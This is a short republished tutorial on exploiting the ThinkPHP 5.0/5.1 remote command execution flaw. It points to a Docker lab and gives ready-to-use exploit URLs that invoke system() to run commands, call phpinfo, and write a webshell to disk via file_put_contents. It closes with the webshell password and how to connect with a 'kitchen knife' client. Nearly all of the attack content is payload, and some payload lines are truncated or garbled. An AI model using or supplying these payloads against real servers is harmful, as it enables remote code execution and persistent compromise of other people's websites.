Home> PHP Framework> ThinkPHP> body text

About ThinkPHP vulnerability exploitation

藏色散人
Release: 2020-08-31 13:37:53
forward
2865 people have browsed it

The following is thethinkphpframework tutorial column to introduce you to ThinkPHP vulnerability exploitation. I hope it will be helpful to friends in need!

About ThinkPHP vulnerability exploitation

thinkphp_5x_Command Execution Vulnerability

Affected versions include 5.0 and 5.1 versions

Docker vulnerability environment source code:
https://github.com/vulnspy/thinkphp-5.1.29
Local environment setup:
thinkphp5.0.15 php5.6n apache2.0
http://www.thinkphp.cn/donate/download/id/1125.html

Use the system function to execute remote commands

EXP
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

Write phpinfo() information through the phpinfo function

EXP:
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index .php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

Write shell

http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^>shell.php 或者 http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=FUCK
Copy after login

Connect using a kitchen knife
`
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/shell.php The password is zane

http://127.0.0.1/middleware/thinkphp_5.0.15_full/ test.php Password is zane
`

The above is the detailed content of About ThinkPHP vulnerability exploitation. For more information, please follow other related articles on the PHP Chinese website!

Related labels:
source:cnblogs.com
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template
About us Disclaimer Sitemap
php.cn:Public welfare online PHP training,Help PHP learners grow quickly!